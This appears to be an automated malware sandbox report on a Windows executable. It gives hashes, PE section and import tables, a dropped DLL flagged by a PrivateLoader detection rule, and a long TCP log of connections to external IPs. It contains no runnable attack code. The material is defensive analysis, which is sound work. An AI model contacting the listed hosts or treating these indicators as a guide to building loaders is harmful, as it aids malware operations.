                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):6.328959132341708
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                                File size:1'153'024 bytes
                                                                                                                                                                                                                                                                MD5:43b0461d2e1c77a8530d66d3e1ae0175
                                                                                                                                                                                                                                                                SHA1:96c50c5b2d652a572e18147e213e8bea38118f94
                                                                                                                                                                                                                                                                SHA256:d4536f1b7e5fbfdfe66be6a404147230dcff7728bc559b493d7bdd8e1adaea08
                                                                                                                                                                                                                                                                SHA512:4ec4add62526c8f2e2119d6043de7494040c86bdb5cceb973fdfd8131e287e0ef52560626fabc66220de1539531e0592683f5e16cb03f384b08f16b4729ad6bd
                                                                                                                                                                                                                                                                SSDEEP:24576:t4HFil+p/dJqGunDHUX/wMsWZfbDR9ceqHKUZAs:t4lzJqGunDH6l59gKUZAs
                                                                                                                                                                                                                                                                TLSH:F3359E3139C09176EEE310B787ECBA29866DD0B0075911DF57D85AEED720AC27F32686
                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t}.50..f0..f0..f.n.g<..f.n.g...f.n.g%..f.n.g3..f0..fm..f...g"..f...g$..f...g...f...g1..f...g1..fRich0..f................PE..L..

                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Entrypoint:0x4011e0
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0x66408D4D [Sun May 12 09:35:09 2024 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:0d00e7b5922fb5549ed71add897d60ba

                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                jmp 00007FAC310FD3ABh
                                                                                                                                                                                                                                                                jmp 00007FAC311239D7h
                                                                                                                                                                                                                                                                jmp 00007FAC310FC8B3h
                                                                                                                                                                                                                                                                jmp 00007FAC311058D1h
                                                                                                                                                                                                                                                                jmp 00007FAC310EF8AAh
                                                                                                                                                                                                                                                                jmp 00007FAC310D9D91h
                                                                                                                                                                                                                                                                jmp 00007FAC311626A2h
                                                                                                                                                                                                                                                                jmp 00007FAC310EFE57h
                                                                                                                                                                                                                                                                jmp 00007FAC31124755h
                                                                                                                                                                                                                                                                jmp 00007FAC311672C4h
                                                                                                                                                                                                                                                                jmp 00007FAC310D5119h
                                                                                                                                                                                                                                                                jmp 00007FAC310FDF8Ah
                                                                                                                                                                                                                                                                jmp 00007FAC310D3DADh
                                                                                                                                                                                                                                                                jmp 00007FAC3110E3FEh
                                                                                                                                                                                                                                                                jmp 00007FAC310E824Ah
                                                                                                                                                                                                                                                                jmp 00007FAC310CBF95h
                                                                                                                                                                                                                                                                jmp 00007FAC31111C16h
                                                                                                                                                                                                                                                                jmp 00007FAC310D7551h
                                                                                                                                                                                                                                                                jmp 00007FAC310D0556h
                                                                                                                                                                                                                                                                jmp 00007FAC3115363Ah
                                                                                                                                                                                                                                                                jmp 00007FAC310CB7CCh
                                                                                                                                                                                                                                                                jmp 00007FAC310CAAD7h
                                                                                                                                                                                                                                                                jmp 00007FAC3111EEEEh
                                                                                                                                                                                                                                                                jmp 00007FAC3113B876h
                                                                                                                                                                                                                                                                jmp 00007FAC310EC40Eh
                                                                                                                                                                                                                                                                jmp 00007FAC3115F3EAh
                                                                                                                                                                                                                                                                jmp 00007FAC3112CED2h
                                                                                                                                                                                                                                                                jmp 00007FAC310F805Ch
                                                                                                                                                                                                                                                                jmp 00007FAC3110648Ch
                                                                                                                                                                                                                                                                jmp 00007FAC310CE65Fh
                                                                                                                                                                                                                                                                jmp 00007FAC31137680h
                                                                                                                                                                                                                                                                jmp 00007FAC31160134h
                                                                                                                                                                                                                                                                jmp 00007FAC310E6219h
                                                                                                                                                                                                                                                                jmp 00007FAC310FE8E3h
                                                                                                                                                                                                                                                                jmp 00007FAC31111BD2h
                                                                                                                                                                                                                                                                jmp 00007FAC3115BB26h
                                                                                                                                                                                                                                                                jmp 00007FAC3114A613h
                                                                                                                                                                                                                                                                jmp 00007FAC310CB44Ah
                                                                                                                                                                                                                                                                jmp 00007FAC3114778Eh
                                                                                                                                                                                                                                                                jmp 00007FAC310E8733h

                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1171e80x28.idata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1190000x4a98.reloc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xcc0700x38.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xcbf880x40.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x1170000x1e8.idata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                .text0x10000xbc1630xbc200b725058dd53b7d7dedb65938fce17658False0.3306945598006645data5.789897639087584IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .bss0xbe0000xd7b0xe0074d38ec06459bd131b05e4b9c14491d4False0.45982142857142855data5.465199311557537IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .rdata0xbf0000x156d70x15800cefbc46009fd83df37132eaff20d485bFalse0.2858489280523256DIY-Thermocam raw data (Lepton 3.x), scale 28160-24832, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 10141204801825835211973625643008.000000, slope 148078355747941908480.0000003.698556344652708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .data0xd50000x41efc0x4040027b49b746c2806fd7f8c16b5cfd5ab85False0.8076133876459144data7.203012112153988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                .idata0x1170000xc850xe002f5de5d5db33e473a3669f61cedae18aFalse0.330078125data4.394738779870993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .00cfg0x1180000x10e0x200dd7371b36f5a16d74de96b27a869ea73False0.03515625data0.11055713125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .reloc0x1190000x57c90x580006eb18e3f1b1c805484fb0d559442570False0.6424893465909091data6.073709849462629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                KERNEL32.dllWaitForSingleObject, ExitProcess, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, FreeConsole, FormatMessageA, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, LocalFree, GetLocaleInfoEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetCurrentThread, HeapFree, HeapAlloc, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, SetConsoleCtrlHandler, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, CreateFileW, HeapSize, SetEndOfFile

                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.401218891 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.401262045 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.401319981 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.408319950 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.408334970 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.743246078 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.743346930 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.791008949 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.791027069 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.791277885 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.791338921 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.794734955 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.836123943 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238809109 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238827944 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238868952 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238902092 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238919973 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238945007 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.238969088 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.397507906 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.397555113 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.397593975 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.397608995 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.397620916 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.397648096 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.425898075 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.425934076 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.425955057 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.425967932 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.426009893 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.518044949 CEST49730443192.168.2.423.195.238.96
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.518065929 CEST4434973023.195.238.96192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.532818079 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.532849073 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.532910109 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.533174992 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:53.533186913 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.552495003 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.552571058 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.557092905 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.557105064 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.557327986 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.557385921 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.558120012 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:54.600116014 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.201886892 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.201947927 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.202071905 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.204788923 CEST49731443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.204799891 CEST4434973165.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.207150936 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.207179070 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.207261086 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.207463026 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.207478046 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.868297100 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.868391037 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.868787050 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.868794918 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.871567011 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:55.871572018 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.951169014 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.951231956 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.951417923 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.951419115 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.951646090 CEST49732443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.951658010 CEST4434973265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.953077078 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.953114033 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.953176975 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.953427076 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:56.953437090 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:57.605804920 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:57.605874062 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:57.606493950 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:57.606507063 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:57.608217955 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:57.608222008 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.679732084 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.679753065 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.679826975 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.679910898 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.680149078 CEST49733443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.680166006 CEST4434973365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.681684017 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.681715012 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.681797981 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.682025909 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:58.682040930 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:59.340619087 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:59.340712070 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:59.341113091 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:59.341121912 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:46:59.342811108 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:46:59.342816114 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.434700012 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.434722900 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.434777021 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.434803009 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.434855938 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.435123920 CEST49734443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.435136080 CEST4434973465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.436530113 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.436558008 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.436652899 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.436870098 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:00.436882973 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:01.096654892 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:01.096738100 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:01.097152948 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:01.097158909 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:01.098903894 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:01.098910093 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.182672024 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.182763100 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.182770014 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.182907104 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.204581976 CEST49735443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.204592943 CEST4434973565.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.469784975 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.469826937 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.469887018 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.470523119 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:02.470535994 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.165467978 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.165555954 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.166040897 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.166049004 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.167745113 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.167749882 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.167789936 CEST49736443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.167799950 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.469650030 CEST49737443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.469681025 CEST4434973765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.469762087 CEST49737443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.470139980 CEST49737443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:03.470151901 CEST4434973765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.132096052 CEST4434973765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.132272005 CEST49737443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.132642984 CEST49737443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.132647991 CEST4434973765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.134423971 CEST49737443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.134428024 CEST4434973765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.367959976 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.368035078 CEST4434973665.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:04.368056059 CEST49736443192.168.2.465.109.242.112
